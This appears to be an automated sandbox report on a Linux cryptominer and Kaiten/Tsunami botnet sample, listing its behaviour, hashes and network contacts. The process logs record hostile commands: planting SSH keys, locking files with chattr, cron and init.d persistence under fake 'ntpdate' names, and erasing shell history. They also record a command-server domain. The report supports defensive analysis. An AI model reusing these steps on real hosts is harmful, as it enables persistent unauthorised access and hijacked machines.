Analysis Overview
SHA256
0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688
Threat Level: Known bad
The file myxmrig.tgz was found to be: Known bad.
Malicious Activity Summary
Kaiten/Tsunami
Xmrig family
Kaiten family
Detects Kaiten/Tsunami payload
xmrig
Detects Kaiten/Tsunami Payload
XMRig Miner payload
Adds new SSH keys
Executes dropped EXE
File and Directory Permissions Modification
Writes file to system bin folder
Modifies init.d
Reads hardware information
Checks hardware identifiers (DMI)
Enumerates running processes
Attempts to change immutable files
Creates/modifies Cron job
UPX packed file
Security Software Discovery
Reads CPU attributes
Checks CPU configuration
Writes file to tmp directory
Process Discovery
System Network Configuration Discovery
Reads runtime system information
Enumerates kernel/hardware configuration
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 11:36
Signatures
UPX packed file
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsbe-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.mips
[./.mips -f]
Network
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | a0669fc7ed6e6c80a991b070e1f7909a |
| SHA1 | 313f4f3deaf4237a8d0059593f1a68d7b7cc434f |
| SHA256 | 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b |
| SHA512 | 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.systemd/-bash | /tmp/.systemd/-bash | N/A |
Enumerates running processes
UPX packed file
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/-bash | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep -v R]
/bin/grep
[grep ssh$]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep -v R]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .x86_64 -bash]
/tmp/.systemd/-bash
[./-bash]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.7:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/.systemd/-bash
| MD5 | 92dc30d449f563a5bdbba08d4a9d57fc |
| SHA1 | ff609eed2df786396203a8806400566df079cc7f |
| SHA256 | 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b |
| SHA512 | 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
Files
/root/.ssh/authorized_keys
| MD5 | 8fe44e7f210016f1a630679fe2379c1b |
| SHA1 | 2ca1d7e85c3f3f57e93c224df0d6765615969b25 |
| SHA256 | 7e086e2e17f07dcf4f39288e348e14ec7cff52af7aca8b537ed13e2fb3fb4189 |
| SHA512 | 981450e6206dcf76811bec0bc3fa8e87b2fd2ac3234754738a3220d29dc1a61b9e82a00ace865d21c365cc598b9caccf58686deb69be5820a52bcfb9b65eaa9c |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.x86_64
[./.x86_64 -f]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| GB | 89.187.167.9:443 | | tcp |
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | b6bd725d6b274dd0e0b8f5535fce571b |
| SHA1 | 419ef40db06a3220262166fa98db357c0ac017fa |
| SHA256 | d2baa726c79e389cb82c2298f854d853aeebc175369f00a4d21eb3dbd03e8bcf |
| SHA512 | c934ad46180bd3e3e3590658ed1f2cc55f48279a099d2bbf852c21af6840f04d9c41f47a8ddf5685e484f76730c4254d85c5c4b4561d9e3d33d1ec089f5e7578 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
1s
Max time network
132s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/.systemd/.i686 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.ssh | /tmp/.systemd/.i686 | N/A |
Processes
/tmp/.systemd/.i686
[/tmp/.systemd/.i686]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | pwn.pwndns.pw | udp |
| CA | 51.79.74.212:80 | pwn.pwndns.pw | tcp |
| US | 8.8.8.8:53 | 731FD16D.DDED1D5.2CE4CC06.IP | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
1s
Max time network
132s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
Detects Kaiten/Tsunami payload
Kaiten family
Kaiten/Tsunami
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/.systemd/.x86_64 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.ssh | /tmp/.systemd/.x86_64 | N/A |
Processes
/tmp/.systemd/.x86_64
[/tmp/.systemd/.x86_64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | pwn.pwndns.pw | udp |
| CA | 51.79.74.212:80 | pwn.pwndns.pw | tcp |
Files
memory/2817-1-0x000077ec2b386000-0x000077ec2b39a760-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.V7hfn5 | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/wc
[wc -l]
/bin/grep
[grep .systemd]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.8:443 | | tcp |
| US | 1.1.1.1:53 | odrs.gnome.org | udp |
| GB | 89.187.167.39:443 | odrs.gnome.org | tcp |
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.V7hfn5
| MD5 | c0cf181774a9fad926645284a3680db5 |
| SHA1 | af146029c4b74552e4bbcb3d6fac3efe25898394 |
| SHA256 | 3d96819b05bc634c0a6c10307757c360512c9af8ff898ee2ae9014e20bffc5a5 |
| SHA512 | 85b7dd7adcfc0b75596b43e5768e06f6e81914b007044286113bc5c26132bffcf2898c912cc492bdad977f1c4d86272fb4fc531fa1ccf5c70cc952721f1cc244 |
/tmp/.systemd/.systemd
| MD5 | 31e12aacb4572270e99f912dfb4e1d2c |
| SHA1 | 942830707a5f7de945e4bf6192c2266bfd529018 |
| SHA256 | f54b32d1e82e3fa5af6e074fdeb416ac8b8581f2cf5ef357d94c9241815228fd |
| SHA512 | be1d751a060eef9e6c5b4d5df4578b2b38631b813ce8d9f7d84563779a1168ce934dad06d39ff501adf47f219531b7a571accb9a857e716a42cb98057010a5d2 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
149s
Max time network
143s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.update/.x86_64 | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.NdujH4 | /usr/bin/crontab | N/A |
Enumerates running processes
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.update/.x86_64 | N/A |
Security Software Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/cpu/types | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.update/.x86_64 | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access1/initiators | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cgroup.controllers | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset.mems.effective | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/DMI | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_latency | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset.cpus.effective | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
